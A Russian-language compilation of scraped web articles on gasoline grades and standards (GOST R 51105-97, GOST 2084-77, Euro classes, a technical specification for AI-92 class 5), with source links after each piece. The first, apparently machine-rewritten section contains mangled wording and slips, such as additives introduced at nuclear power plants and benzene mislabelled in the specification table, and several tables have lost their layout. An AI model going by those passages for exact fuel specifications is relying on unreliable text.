Бензин по гост

Бензин ГОСТ Р 51105, применение:

Этот стандарт относится к неэтилированным бензинам для автотранспорта.

Широкое применение неэтилированный бензин нашел себя в качестве топлива мото- и автомобильных двигателей. Используется и в двигателях с другим предназначением, в которых используется неэтилированный и этилированный бензин.

Маркировка неэтилированных автомобильных бензинов зависит от того, какое в них октановое число. Октановое число было определено специальным методом исследования.

Установлены марки неэтилированных автобензинов, которые представлены ниже:

  • Нормаль 80 (более 80);
  • Регуляр 91 (более 91);
  • Регуляр 92 (более 92);
  • Премиум 95 (более 95);
  • Супер 98 (более 98).

Также автомобильные неэтилированные бензины распределяются на пять классов, заключается  зависимость от того в каком климатическом районе он используется по ГОСТу 16350:

  1. Климатический район с первого апреля по первое октября (II9);
  2. Климатический район с первого апреля по первое октября  (II4 и II5);
  3. Климатический район с первого апреля по первое октября (I1 и I2) и с первого октября по первое апреля (II9);
  4. Климатический район с первого октября по первое апреля (II4 и II5);
  5. Климатический район с первого октября по первое апреля (I1 и I2).

Бензин ГОСТ Р 51105, конструктивные характеристики

Во время изготовления автомобильного неэтилированного бензина разрешено применение компонентов, содержащих кислород и другие добавки с высоким октановым числом, а также присадки, которые повышают уровень экологического показателя бензинов и разрешенные к использованию.

Ввод в автомобильные неэтилированные бензины моющих присадок может осуществляться во время отгрузок потребителю. Кроме этого, ввод возможен на АЭС, нефтепромышленных базах либо же в сам бензобак на заправке автомобиля.

Упаковка с маркировкой автомобильных неэтилированных бензинов осуществляется по ГОСТу 1510. Маркировка, которая характеризует транспортную небезопасность автомобильных неэтилированных бензинов, (ГОСТ 19433), подкласс 3.1, — класс третий, знак опасности 3, шифр классификации 3111, ООН номер 1203.

Условия приемок. Прием автомобильных неэтилированных бензинов происходит партиями.

Партия – это продукт, который изготавливается путем беспрерывного технологического процесса, компонентный состав и показатель качества при этом процессе однороден; продукт,  возможно, изготовить в любом количестве.

Сопровождается, как правило,  он  одним документом,  в котором  определяется качества продукта , выдается во время приемки, основанное на испытаниях объединенных проб.

Проверка индукционного периода неэтилированного бензина проверяется изготовителем систематически раз в квартал и чаще. Также возможно и дополнительно по желанию заказчика.

Если в результате испытаний, результаты окажутся неудовлетворительными, испытания переводятся исполнителем по этому показателю в приемосдаточную категорию до того, как получены положительные результаты не менее, чем в 3х партиях.

Если один показатель как минимум покажет неудовлетворительный результат, испытание проводится заново с новой пробой и с этой же партии. Распространение результатов повторного испытания относится ко всей партии.

Способы испытаний. Отбор проб автомобильного неэтилированного бензина выполняют по ГОСТу 2517 либо по приложению А (16, 28, 27). Кубатура объединенных проб – по 2 дм3. бензина из каждой марки. При возникновении разногласий проб автомобильных неэтилированных бензинов, проводится отбор в тару с темным стеклом.

Уровень концентрации марганца в неэтилированном бензине марки Нормаль-80 (который содержит 30-50 мг/дм3 марганца) определяется приложением А (13) на тех образцах бензина, что разбавлены вдвое ксилолом либо метилэтилкетоном.

При наполнении стеклянного сосуда (диаметр 40-55 мм) автомобильным неэтилированным бензином, должны отсутствовать осевшие на дно или взвешенные посторонние примеси, должна отсутствовать вода, бензин должен быть прозрачный.

Рассчитываем индекс испаряемости. Индекс испаряемости определяет уровень испаряемости неэтилированного бензина с его предрасположенностью образования паровых пробок во время определенного сочетания давлений насыщ. паров и объемов испарившегося неэтилированного бензина (при тем-ре 70 °С).

  • Индекс испаряемости рассчитывается по формуле: ИИ= 10ДНП(давление насыщенных паров)+ 7V70,
  • Где V70 под понимают объем испарения неэтилированного бензина (при тем-ре 70º, в %).
  • Бензин ГОСТ Р 51105, технические характеристики
  • Изготовление автомобильных неэтилированных бензинов должно происходить согласно требованиям технологической документации, которая установлена в определенном порядке.
  • В зависимости от показателей физических, химических и эксплуатационных, автомобильный неэтилированный бензин должен отвечать определенным требованиям и нормам, они отмечены в данной таблице:
Наименования показателей Обозначение марки Способ испытаний
  1. Нормаль-80 ОКП 02 5112
  2. 3701
  • Регуляр-91 ОКП 02 5112
  • 3702
  1. Регуляр-92 ОКП 02 5112
  2. 3705
  • Премиум-95 ОКП 02 5112
  • 3703
  1. Супер-98 ОКП 02 5112
  2. 3704
1. Октановое число, не меньше чем:
по способу исследования 80,0 91,0 92,0 95,0 98,0 По ГОСТу 8226 либо приложению А [9, 33]
по моторному способу 76,0 82,5 83,0 85,0 88,0 По ГОСТу 511 либо приложению А [10, 32]
2. Свинцовая концентрация, грамм/дм3, не больше 0,010 По ГОСТу 28828 либо приложению А [12, 23]
3. Марганцевая  концентрация, миллиграмм/дм3, не больше 50 18 По 7.2 и приложению А [13]
4.Концентр-я фактических смол,      миллиграмм/ 100 см3 бензина, не больше 5,0 По ГОСТу 1567 либо приложению А [4, 20]
5. Весовая доля серы, в %, не больше 0,05 По ГОСТу 19121 либо ГОСТу Р 50442, либо приложению А [6, 8, 17, 35]
6. Индукц-ный период бензола, минут, не меньше 360 По ГОСТу 4039 либо приложению А [5, 34]
7. Испытание медной пластинки Выдержка I класса По ГОСТу 6321 либо приложению А [2, 25]
8. Объемная часть бензина, в %, не больше 5 По ГОСТу 29040 либо приложению А[11, 15, 18, 24]
9. Визуальный вид Прозрачный, чистый По 7.3
10 Плотность при температуре 15 °С, в килограммах/м3 700-750 725-780 725-780 725-780 725-780 По ГОСТу Р 51069 либо приложению А [7, 14, 29, 30]
П р и м е ч а н и е: Определение концентрации марганца необходимо только для тех бензинов, в которых присутствует марганцевый антидетонатор (МЦТМ). В автомобилях неэтилированных бензинов длительного хранения должен присутствовать индукционный период не меньше 1200 минут.Поставки автомобильного неэтилированного бензина марки «Регуляр-91» можно совершать до 1 января 2003 года. До этой же даты разрешена поставка и автомобильных неэтилированных бензинов с марганцевыми антидетонаторами. Запрещена поставка автомобильных неэтилированных бензинов с марганцевым антидетонатором в те районы, в которых этилированные бензины не допускаются к использованию.

В следующей таблице мы рассмотрим характеристики испаряемости неэтилированных бензинов:

Наименования показателей Классовое значение Способ испытаний
1 2 3 4 5
1 Давления насыщен. паров бензина, в кПа и ДНП По ГОСТу 1756 либо ГОСТу 28781, либо приложению А[3. 19, 21]
минимум 35 45 55 60 80
максимум 70 80 90 95 100
2 Фракционный состав: По ГОСТу 2177 либо приложению А [1, 26]
Температура, с которой начинается перегонка, °С, не менее 35 35 Нормирование отсутствует
предел перегонки, в °С, не более:
10 % 75 70 65 60 55
50 % 120 115 110 105 100
90 % 190 185 180 170 160
окончание кипения, в °С, не более 215
часть остатка в колбе, в %, (объем) 2
остаток с потерей, в % (объем) 4
либо объем испаряемого бензина, в %, при темпер-ре: Выдержка I класса По ГОСТу 2177 либо приложению А [1, 26]
70 °С минут 10 15 15 15 15
максимум 45 45 47 50 50
100 °С минут 35 40 40 40 40
максимум 65 70 70 70 70
180 °С, не меньше 85 85 85 85 85
часть остатка в колбе, в %, (объем) 2
окончание кипения, в °С, не более 215
остаток с колбы, в % (по объему), не больше 2
3 Индекс испар-сти, не больше 900 1000 1100 1200 1300 По 7.4 либо приложению А [22]

Правила безопасности и правила охраны окруж. среды, которые необходимо соблюдать. Обладая действием, схожим на наркотическое, автомобильные бензины также негативно влияют на верхние дыхательные пути, кроме этого на слизистую оболочку глаз вместе с кожей человека. Кроме этого регулярные контакты с бензином способны вызвать хронические экземы и острые воспаления.

Источник: https://oborudka.ru/oborudovanie/133.html

Химия нефти

Реактивное топливо Дизельное топливо Жидкие топлива

ГОСТ 2084-77 распространяется на бензины, применяемые в качестве топлива для карбюраторных автомобильных и мотоциклетных двигателей, а также двигателей другого назначения. На территории РФ требования стандарта распространяются только на бензин марки А-76 неэтилированный.

Требования к качеству А-76 по ГОСТ-2084-77:

  • Фракционный состав:
    • начало кипения:
      • летнего бензина — не ниже 35°С
      • зимнего бензина — не нормируется
    • 10% (об.):
      • летнего бензина — 70°С
      • зимнего бензина — 55°С
    • 50% (об.):
      • летнего бензина — 115°С
      • зимнего бензина — 100°С
    • 90% (об.):
      • летнего бензина — 180°С
      • зимнего бензина — 160°С
    • конец кипения:
      • летнего бензина — 195°С
      • зимнего бензина — 185°С
    • остаток в колбе — не более 1,5% (об.)
  • Октановое число моторным методом — не менее 76
  • Октановое число исследовательским методом — не нормируется
  • Содержание свинца — не более 0,013 г/дм3
  • Давление насыщенных паров:
    • летнего бензина — 66,7 кПа
    • зимнего бензина — 66,7-93,3 кПа
  • Кислотность — не более 1,0 мг KOH/100 см3 топлива
  • Содержание фактических смол:
    • на месте производства — не более 5,0 мг/100 см3
    • на месте потребления — не более 10,0 мг/100 см3
  • Содержание серы — не более 0,1 % (масс.)
  • Индукционный период окисления на месте производства — не менее 1200 минут
  • Цвет — желтый

Требования по ГОСТ Р 51105-97

В соответствии с ГОСТ Р 51105-97 в настоящее время вырабатываются только неэтилированные бензины (свинца не более 0,01 г/дм3).

Требования к качеству автомобильных бензинов (ГОСТ Р 51105-97).

Показатель Марка бензина
«Нормаль-80» «Регуляр-91» «Регуляр-92» «Премиум-95» «Супер-98»
Октановое число, не менее:
    моторный метод 76,0 82,5 83,0 85,0 88,0
    исследовательский метод 80,0 91,0 92,0 95,0 98,0
Содержание свинца, г/дм3, не более 0,010 0,010 0,010 0,010 0,010
Содержание марганца, мг/ дм3, не более 50 18
Содержание фактических смол, мг/100 см3, не более 5,0 5,0 5,0 5,0 5,0
Содержание серы, % (маcc.), не более 0,05 0,05 0,05 0,05 0,05
Содержание бензола, % (об.), не более 5,0 5,0 5,0 5,0 5,0
Индукционный период окисления, мин., не менее 360 360 360 360 360
Испытание на медной пластине Выдерживает
Внешний вид Чистый прозрачный
Плотность при 15°С, кг/м3 700-750 725-780 725-780 725-780 725-780

В зависимости от октанового числа, определенного по исследовательскому методу, выпускаются пять марок бензинов:

  • «Нормаль-80» — предназначен для использования на грузовых автомобилях;
  • «Регуляр-91», «Регуляр-92» — предназначены для эксплуатации легковых автомобилей;
  • «Премиум-95» и «Супер-98» — предназначены в основном для зарубежных автомобилей, эксплуатируемых в России.

На экспорт выпускаются следующие марки автомобильных бензинов: А-80, А-92, А-96 и АИ-98. Числовые значения в марках бензинов указывают на октановое число, определяемое по исследовательскому методу.

По моторному методу октановые числа этих бензинов должны быть не менее 76, 83, 85 и 88 пунктов соответственно.

Для всех экспортных бензинов повышены требования к температурам выкипания 50% бензинов (не выше 120°С) и концу кипения (не выше 215°С), ужесточены нормы по содержанию серы (не выше 0,05% масс.) и изменен ряд других показателей.

Требования к реформулированному бензину

Интенсивное развитие промышленности и расширение сферы использования нефтепродуктов всех видов приводят к возрастающему загрязнению окружающей среды.

В связи с этим нефтеперерабатывающая промышленность всего мира сталкивается с жесткими экологическими требованиями к качеству выпускаемых продуктов.

Так, например, в США Управлением по охране окружающей среды опубликованы требования к так называемому реформулированному бензину.

  • Реформулированный бензин — бензин с принципиально измененным компонентным составом, производимый для минимизации экологического ущерба от его использования при сохранении технического уровня транспортных средств.
  • Ужесточение требований к экологически чистому реформулированному бензину предусматривает ограничения по содержанию ароматических углеводородов (продукты окисления ароматических углеводородов — канцерогены), непредельных углеводородов (непредельные углеводороды являются причиной смога и исчезновения озонового слоя Земли), серы (оксиды серы — причина кислотных дождей, яд для дожигателей выхлопных газов, способствуют коррозии металла) и обязательное добавление к бензину кислородсодержащих соединений.
  • Основные показатели качества реформулированного бензина.
Показатель Простая модель (1-й этап производства) Сложная модель (2-й этап производства)
ДНП, кПа (по Рейду) 49,6-55,8 48,3
Содержание бензола, % (об.), не более 1,0 0,8-1,0
Содержание серы, % (масс.), (ррm), не более 0,01 (100) 0,003-0,004 (30-40)
Содержание олефинов, % (масс.), не более 12 5
Содержание кислорода, % (масс.), не менее 2,0 1,8-2,2

В Европе также поэтапно вводятся жесткие нормы к качеству автомобильных бензинов. Сравнительная характеристика требований к автобензинам Европейского Союза, России, США представлена в таблице.

Сравнительная характеристика требований к автомобильным бензинам

Параметр Европейский Союз Россия США
Евро 21995 г. Евро 31998 г. Евро 42007 г. Евро 52009 г. ГОСТ Р 51105-9701.01.99 г. 2003 г.
Содержание бензола, % (об.), не более 5 1 1 1 5 1
Содержание ароматических углеводородов, % (об.), не более не нормируется 42 35 35 не нормируется 30
Содержание серы, % (маcc.), (ррм) 0,05 (500) 0,015 (150) 0,003 (30) — 0,001 (10) 0,001 (10) 0,05 (500) 0,015 (150)
Содержание олефинов, % (масс.), не более не нормируется 18 18 18 не нормируется не нормируется
Содержание кислорода, % (масс.), не более не нормируется 2,7 2,7 2,7 не нормируется 1,8-2,2
Применение моющих присадок не нормируется обязательно обязательно обязательно не нормируется не нормируется

Для приведения топлив выпускаемых в РФ к требованиям экологических стандартов Евро-2,3,4,5 5 сентября 2008 г. в соответствие с Постановлением Правительства Российской Федерации от 27 февраля 2008 г. N 118 г. в силу вступил Технический регламент «О требованиях к автомобильному и авиационному бензину, дизельному и судовому топливу, топливу для реактивных двигателей и топочному мазуту».

Документ предполагает разделение автомобильных бензинов и дизельного топлива на четыре класса — второй, третий, четвертый и пятый, что соответствует стандартам «Евро-2», «Евро-3», «Евро-4» и «Евро-5».

В соответствии с Постановлением Правительства Российской Федерации от 30 декабря 2008 г. N 1076 г. выпуск в оборот автомобильного бензина допускается в отношении:

  • класса 2 — до 31 декабря 2010 г.;
  • класса 3 — до 31 декабря 2011 г.;
  • класса 4 — до 31 декабря 2014 г.;
  • класса 5 — срок не ограничен.

Требования к характеристикам автомобильного бензина в соответствии с Техническим регламентом.

Параметры Единицы измерения Значение параметра
класс 2 класс 3 класс 4 класс 5
Массовая доля серы, не более мг/кг 500 150 50 10
Объемная доля бензола, не более % 5 1 1 1
Концентрация железа, не более мг/дм3 отсутствие отсутствие отсутствие отсутствие
Концентрация марганца, не более мг/дм3 отсутствие отсутствие отсутствие отсутствие
Концентрация свинца, не более мг/дм3 отсутствие отсутствие отсутствие отсутствие
Массовая доля кислорода, не более % 2,7 2,7 2,7
Объемная доля углеводородов, не более:
    ароматических % 42 35 35
    олефиновых % 18 18 18
Октановое число:
    по исследовательскому методу, не менее 92 95 95 95
    по моторному методу, не менее 83 85 85 85
Давление насыщенных паров, не более:
    в летний период кПа 45-80 45-80 45-80
    в зимний период кПа 50-100 50-100 50-100
Объемная доля оксигенатов, не более:
    метанола % отсутствие отсутствие отсутствие
    этанола % 5 5 5
    изопропанола % 10 10 10
    третбутанола % 7 7 7
    изобутанола % 10 10 10
    эфиров, содержащих 5 или более атомов углерода в молекуле % 15 15 15
    других оксигенатов (с температурой конца кипения не выше 210°С) % 10 10 10
Реактивное топливо Дизельное топливо Жидкие топлива

Источник: http://proofoil.ru/Oilchemistry/fuelproperty3.html

Технические условия на БЕНЗИН АВТОМОБИЛЬНЫЙ АТОМ-92 КЛАСС 5 | Центр сертификации ФЦСМ ГОСТ СТАНДАРТ с 1999 года!

Содержание

Введение………………………………………………………………………..… 3
1 Технические требования………………………………………………………… 3
2 Требования безопасности………………………………………………………. 8
3 Требования защиты окружающей среды…………………………………….. 10
4 Правила приёмки…………………………………………………………………… 11
5 Методы контроля………………………………………………………………… 12
6 Транспортирование и хранение………………………………………………… 12
7 Гарантии изготовителя…………………………………………………………… 13
Приложение А……………………………………………………………………. 14
Лист регистрации изменений…………………………………………………… 17
  • Введение
  • Настоящие технические условия (ТУ) распространяются на бензин автомобильный марки АТОМ-92 класс 5 (далее по тексту бензин, топливо, продукция), предназначенное в качестве моторного топлива на транспортных средствах с бензиновыми двигателями, сконструированными для работы на неэтилированном бензине.
  • Пример записи изделия при заказе:

«Бензин АТОМ-92 класс 5 по ТУ 19.20.21-001-23826636-2017».

Настоящие технические условия разработаны в соответствии с ГОСТ 2.114.

Перечень ссылочной документации приведен в Приложении А.

1                    Технические требования

  1. 1Основные параметры и характеристики
  2. 1.1Продукция должны соответствовать требованиям настоящих технических условий, ГОСТ 305 (п. 5), ГОСТ Р 51105 (п. 4), ГОСТ 32513-2013, ТР ТС 013/2011 «О требованиях к автомобильному и авиационному бензину, дизельному и судовому топливу, топливу для реактивных двигателей и мазуту» и изготавливаться по технологической документации, утвержденной в установленном порядке.
  3. 1.2Бензин выпускается экологического класса К5.
  4. 1.3Продукцию получают путем добавления многофункциональной присадки Keropur 3638 в бензин неэтилированный, марки АИ-92-К5 по ГОСТ 32513-2013 в количестве 300-900 г добавки на 1 тонну бензина.
  5. 1.4Основные характеристики продукции приведены в таблицах 1.1.

Таблица 1.1

Наименование характеристики Показатель Метод контроля
Внешний вид Чистый, прозрачный ГОСТ Р 51105
Массовая доля серы, мг/кг, не более 10 ГОСТ 19121
Объемная доля бензола, %, не более 1 ГОСТ 29040 ГОСТ Р 51941
Массовая доля кислорода, %, не более 2,7 ГОСТ Р ЕН 1601
  1. Объемная доля углеводородов, %, не более:
  2. —      ароматических
  3. —      олефиновых
35 18 ГОСТ Р 52714
  • Октановое число:
  • —      по исследовательскому методу, не менее
  • —      по моторному методу, не менее
92 83 ГОСТ 8226 ГОСТ 511
  1. Давление насыщенных паров, кПа:
  2. —      в летний период
  3. —      в зимний период
35-80 35-100 ГОСТ 1756 ГОСТ 28781
Концентрация железа, мг/дм3, не более Отсутствие ГОСТ Р 52530
Концентрация марганца, мг/дм3, не более Отсутствие ГОСТ Р 51925
Концентрация свинца, мг/дм3, не более Отсутствие ГОСТ 28828
Объемная доля монометиланилина, не более Отсутствие ГОСТ Р 54323
  • Объемная доля оксигенатов, не более:
  • —      метанола
  • —      этанола
  • —      изопропанола
  • —      третбутанола
  • —      изобутанола
  • —      эфиров, содержащих 5 или более атомов углерода в молекуле
  • —      других оксигенатов (с температурой конца кипения не выше 210 ºС)
  1. Отсутствие
  2. 5
  3. 10
  4. 7
  5. 10
  6. 15
  7. 10
ГОСТ Р 52256
Индукционный период бензина, мин, не менее 360 ГОСТ 4039 ГОСТ Р 52068
Испытание на медной пластине Выдерживает I класс ГОСТ 6321
Плотность при 15 ºС, кг/м3 725-780 ГОСТ Р 51069
  1. 2Требования к сырью
  2. 2.1Сырье должно соответствовать действующей на них нормативной документации и иметь сопроводительные документы, подтверждающие его соответствие.
  3. 2.2Продукция производится путем добавления присадки к бензину.
  4. 2.3Для производства применяется:

—                    бензин АИ-92-К5 по ГОСТ 32513-2013;

—                    присадка Кeropur 3638 по спецификации производителя.

  1. 2.4Допускается частичная замена сырья для продукции, если эта замена не ухудшает качество, безопасность и товарный вид продукции.
  2. 2.5Качество и основные характеристики сырья должны подтверждаться документами о качестве или сертификатами соответствия, выданными в установленном порядке.
  3. 2.6При отсутствии документов о качестве на конкретное сырье все необходимые испытания должны быть проведены при изготовлении продукции.
  4. 2.7Транспортирование и хранение сырья должны проводиться в условиях, обеспечивающих сохранность, а также исключающих возможность подмены.
  5. 2.8Перед использованием компоненты должны пройти входной контроль в соответствии с порядком, установленным на предприятии-изготовителе, исходя из требований ГОСТ 24297.
  6. 3Комплектность
  7. 3.1Комплектность поставки изделий должна соответствовать условиям заказа.
  8. 3.2В состав поставки продукции должны входить документ о качестве (паспорт).
  9. 3.3Паспорт должен содержать:
  • —                    наименование и обозначение марки топлива;
  • —                    наименование изготовителя (уполномоченного изготовителем лица) или импортера, или продавца, их местонахождение (с указанием страны);
  • —                    обозначение настоящих технических условий;
  • —                    нормативные значения и фактические результаты испытаний;
  • —                    дату выдачи и номер паспорта;
  • —                    подпись лица, оформившего паспорт;
  • —                    сведения о декларации соответствия;
  • —                    сведения о наличии присадок в топливе.
  1. 4Маркировка
  2. 4.1Продукция должна иметь маркировку в соответствии с требованиями ГОСТ 1510, ТР ТС 013/2011 «О требованиях к автомобильному и авиационному бензину, дизельному и судовому топливу, топливу для реактивных двигателей и мазуту» и настоящих технических условий:
  1. —                    наименование;
  2. —                    масса нетто или объем;
  3. —                    номер партии и месяца, года изготовления;
  4. —                    наименование и (или) товарный знак изготовителя;
  5. —                    наименование страны, где изготовлена продукция;
  6. —                    надпись «Огнеопасно»;
  7. —                    сведения о наличии присадок в топливе;
  8. —                                        обозначение настоящих технических условий.
  1. 4.2Маркировка продукции должна быть разборчивой, легко читаемой и нанесена на них в доступном для осмотра без разборки с применением инструмента месте.
  2. 4.3Маркировка, характеризующая транспортную опасность бензинов, поГОСТ 19433: класс — 3, подкласс — 3.1, знак опасности — по рисунку 3, классификационный шифр — 3111, номер ООН – 1203.
  3. 4.4Маркировка тары по ГОСТ 14192. На таре должны быть нанесены знаки, соответ­ствующие значениям: «Верх», «Огнеопасно».
  4. 5Упаковка
  5. 5.1Продукцию упаковывают в емкости из полимерных материалов по действующим нормативным документам; упаковывают и транспортируют в железнодорожных цистернах по ГОСТ Р 51659, оборудованных универсальным сливным прибором, и автоцистернах, нефтеналивных суднах.
  6. 5.2Допускается упаковка в тару потребителя, обеспечивающую сохранность продукта.
  7. 5.3Степень заполнения тары не должна превышать 95%.
  8. 5.4После заполнения тара с жидкостью должна быть герметично закрыта и опломбирована.

2                    Требования безопасности

Источник: https://xn——6kcbaeeywflm3c1andac1au8v.xn--p1ai/tekhnicheskie-usloviya-na-benzin-avtomobilnyj-atom-92-klass-5

Какие бывают марки бензина?

В настоящее время в России вырабатывают следующие марки автомобильных бензинов: АИ-80 (А-76), АИ-92, АИ-95 и АИ-98.

В соответствии с требованиями стандарта ГОСТ Р 51105-97 «Топлива для двигателей внутреннего сгорания. Неэтилированный бензин. Технические условия» осуществляется производство неэтилированных бензинов следующих марок:

  • «Нормаль-80» с октановым числом по исследовательскому методу не менее 80 ед.;
  • «Регуляр-92» с октановым числом по исследовательскому методу не менее 92 ед.;
  • «Премиум-95» с октановым числом по исследовательскому методу не менее 95 ед.,
  • «Супер-98» с октановым числом по исследовательскому методу не менее 98 ед.,
  • Бензин «Нормаль-80» предназначен для использования на грузовых автомобилях с карбюраторными двигателями наряду с бензином А-76 по ГОСТ 2084-77.

Дополнительное нормирование октанового числа по исследовательскому методу обеспечивает более высокое качество бензина, так как фактическое значение октанового числа по исследовательскому методу бензинов А-76, вырабатываемых по ГОСТ 2084-77, находятся в пределах 74—82 ед., что в ряде случаев ниже установленной в ГОСТ Р 51105-97 нормы (не менее 80 ед.).

Неэтилированный бензин марки «Регуляр-92» предназначен для применения на автомобилях взамен этилированного бензина марки АИ-93.

Автомобильные бензины марок «Премиум-95» и «Супер-98» предназначены в основном для зарубежных автомобилей, ввозимых в Россию. Применение неэтилированных автомобильных бензинов, вырабатываемых по ГОСТ Р 511 05-97, дает возможность обеспечить выполнение норм на выбросы Евро-2 автомобилями, оснащенными каталитическими нейтрализаторами отработавших газов.

В соответствии с ГОСТ Р 51866-2002 (ЕН 22899) «Топлива моторные. Бензин неэтилированный. Технические условия» вырабатывают неэтилированные автобензины марок: «Регуляр ЕВро-92», «Премиум Евро-95» и «Супер Евро- 98».

  1. Эти бензины предназначены для использования на автомобилях с бензиновыми двигателями, отвечающим требованиям Евро-3.
  2. Климатические условия на территории России таковы, что повсеместное применение бензинов с одинаковой испаряемостью нецелесообразно и практически невозможно.
  3. Поэтому по ГОСТ 2084-77 бензины подразделяют на зимний и летний, по ГОСТ Р 511 05-97 для более рационального использования бензины по предложению ОАО «АвтоВаз» имеют 5 классов испаряемости, а по ГОСТ Р 51866-2002 — 10 классов испаряемости, для применения в различных климатических районах.

Наряду с автобензинами для внутреннего потребления нефтеперерабатывающие предприятия вырабатывают автомобильные бензины для экспорта, которые также применяются в России. Основная масса бензина АИ-92 вырабатывается по ТУ 38.001165-2003 «Бензины автомобильные экспортные».

С целью обеспечения Москвы и других регионов с высокой плотностью автомобильного транспорта автомобильными бензинами с улучшенными экологическими свойствами нефтеперерабатывающие заводы вырабатывают автобензины по техническим условиям с более жесткими нормами на содержание бензола и ароматических углеводородов, чем по ГОСТ Р 51105-7.

Так, ОАО «Московский НПЗ» вырабатывает бензины по ТУ 38.401-58-171-96 «Бензины автомобильные неэтилированные с улучшенными экологическими свойствами (городские)», а ОАО «Славнефть-Ярослав-нефтеоргсинтез» — бензины «Яр Марка» по ТУ 38.301-25-41-97.

Перспективы развития производства товарных автомобильных бензинов связаны с увеличением доли выработки высокооктановых бензинов (92 ед. и выше по и. м.). Следует отметить, что повышение октанового числа на каждую единицу позволяет снизить расход топлива автомобилем на 1%, т. е. при применении автобензина АИ-92 взамен АИ-80 экономия бензина составит 12%.

Однако это не значит, что, если в двигатель, работающий на бензине марки А-76, залить бензин АИ-92, то получим указанную экономию. Наоборот, двигатель будет перегреваться, и могут прогореть клапана.

Высокооктановые бензины имеют более высокое качество и по другим показателям: меньшее содержание общей и меркаптановой серы, меньшую коррозионную агрессивность и содержание смолистых веществ, более высокую химическую стабильность и т. д.

В ближайшее время следует ожидать расширения ассортимента присадок к бензинам (прежде всего моющих) и повышение их эффективности, что позволит снизить вредные выбросы с отработавшими газами и повысить надежность работы и долговечность эксплуатации автомобилей.

Источник: https://www.vseznaniya.ru/useful/auto/638-gasmarks

Бензины— легковоспламеняющиеся бесцветные или слегка желтые (при отсутствии специальных добавок) жидкости. Бензины имеют высокую летучесть и температуры вспышки в пределах 20-40 градусов по Цельсию, застывания—ниже минус 60 градусов. Они предназначены для  поршневых двигателей внутреннего сгорания с принудительным воспламенением (от искры).  

Надежная, долговечная, эффективная и экономичная работа любого карбюраторного двигателя будет обеспечена только в том случае, если бензин удовлетворяет следующим требованиям:

  • имеет высокие карбюрационные свойства, т.е. образует такую горючую смесь, которая обеспечивает легкий пуск двигателя и устойчивую работу при всех возможных режимах;
  • не вызывает детонации двигателя (имеет достаточную детонационную стойкость);
  • обеспечивает полное сгорание (не вызывает смоло- и нагарообразования на деталях двигателя);
  • обладает высокой стабильностью, т.е. при длительном хранении, перекачках и транспортировке не претерпевает существенных изменений;
  • при хранении не вызывает коррозии металлов резервуаров, баков, трубо- и топливопроводов, а при сгорании — деталей двигателей от действия продуктов сгорания (имеет высокие антикоррозионные свойства);
  • теплота сгорания горючей смеси должна быть максимально возможной.

Основным  параметром, характеризующим качество бензина 95, бензина 92, бензина 80 является его детонационная стойкость. Этот показатель определяет способность  автомобильных бензинов противостоять  самовоспламенению при сжатии. При  повышении степени сжатия увеличивается  литровая мощность и снижается удельный расход бензина.

  Чем выше степень сжатия, тем большей детонационной стойкостью должен обладать бензин. Поэтому увеличение степени сжатия для улучшения технико-экономических и эксплуатационных показателей автомобиля — основная задача современного автомобильного двигателестроения.

Высокая детонационная стойкость топлива обеспечивает их нормальное сгорание на всех режимах эксплуатации двигателя. Показателем детонационной стойкости автомобильного бензина 95, бензина 92, бензина 80 является октановое число. Бензин при этом сравнивается со смесью изооктана (условно принятого за 100 единиц) и нормального гептана (принятого за 0).

Если октановое число бензина равно 95, то это означает, что он детонирует как смесь 95% изооктана и 5% гептана.  

Октановое число на установках определяется двумя  методами: моторным (буква «А» в  названии бензина), по ГОСТ 511-82, и исследовательским («АИ»), по ГОСТ 8226-82. Методы отличаются условиями проведения испытаний.

Испытания по моторному методу проводят при более напряженном режиме работы одноцилиндровой установки, чем по исследовательскому. Поэтому октановое число, определенное моторным методом, обычно ниже октанового числа, определенного исследовательским методом.

Октановое число, полученное моторным методом, в большей степени характеризует детонационную стойкость топлива при эксплуатации автомобиля в условиях повышенного теплового форсированного режима, чем октановое число, полученное исследовательским методом — характеризует бензин при работе на частичных нагрузках в условиях городской езды.   Цифры, присутствующие в марке бензина, обозначают его октановое число. Бензин 95 и бензин 92, поставляемые ООО «ТРЭЙДЭР, являются высокооктановыми.

В последние  годы на первый план выдвигаются экологические  свойства топлива (содержание свинца, серы, бензола, ароматических и олефиновых углеводородов). 

Основную  массу автомобильных бензинов в  России вырабатывают по  ГОСТ 2084-77, ГОСТ Р51105-97 ГОСТ Р 51313-99  и ТУ 38.001165-97. С 01.01.99 г.

на территории Российской Федерации действует ГОСТ Р 51105-97 «Бензины автомобильные неэтилированные», который практически полностью соответствует требованиям на Европейские бензины, изложенные в стандарте EN 228 в редакции до 2000 г. и соответствующим эколого-санитарным требованиям Евро-2.

 Этот  ГОСТ содержит требования на четыре сорта автомобильных бензинов: Нормаль-80, Регуляр-92, Премиум-95 и Супер-98 (все неэтилированные с содержанием свинца не более 0,01 г/л). Все бензины, выпускаемые по техническим условиям, должны соответствовать требованиям ГОСТ Р 51313-99 «Бензины автомобильные.

Общие технические требования», который введен с 01 июля 2000г. Соответствие бензинов, выпускаемых по техническим условиям, требованием ГОСТ Р 51313-99 проверяется при их сертификации, которая является обязательной.   

В марке бензина  Аи-92 (Регуляр-92) цифрами обозначено октановое число, характеризующее его детонационную стойкость.

  Автомобильный бензин Регуляр-92, выпускаемый по ГОСТ Р 51105-97,   полностью отвечает европейским требованиям, изложенным в стандарте EN 228,  и соответствует эколого-санитарным нормам Евро-2.

    Каждая партия отгружаемого бензина сопровождается паспортом качества и/или сертификатом соответствия.  

Физико-химические и эксплуатационным показатели бензина Регуляр-92 приведены в Табл.1  

№   Наименование  показателей Значение  для класса
1 2
1 Октановое число, не менее: по моторному методу 83,0
по исследовательскому методу 92,0
2 Концентрация свинца, г / 1дм3 бензина не более 0,010
3 Концентрация фактических  смол , мг на 100см бензина, не более 5,0
Индукционный период бензина, мин. не менее  360
5 Массовая доля серы, % ,не более 0,05
Объемная доля бензола ,% не более 5
Испытание на медной пластинке  Выдерживает класс 1
8 Внешний вид  Чистый, прозрачный
9 Плотность при 15оС, кг/м3 725-780
10 Давление насыщенных паров бензина,, кПа , ДНП  мин. 35 45
мах 70 %

Одним из основных показателей  качества любого бензина является его  детонационная стойкость.  

Этот показатель характеризует способность автомобильных  бензинов противостоять самовоспламенению  при сжатии.

Высокая детонационная  стойкость топлива обеспечивает их нормальное сгорание на всех режимах  эксплуатации двигателя.

Поэтому увеличение детонационной стойкости позволяет повысить эксплуатационные показатели и экономичность работы двигателя, и является определяющим в развитии автомобилестроения.

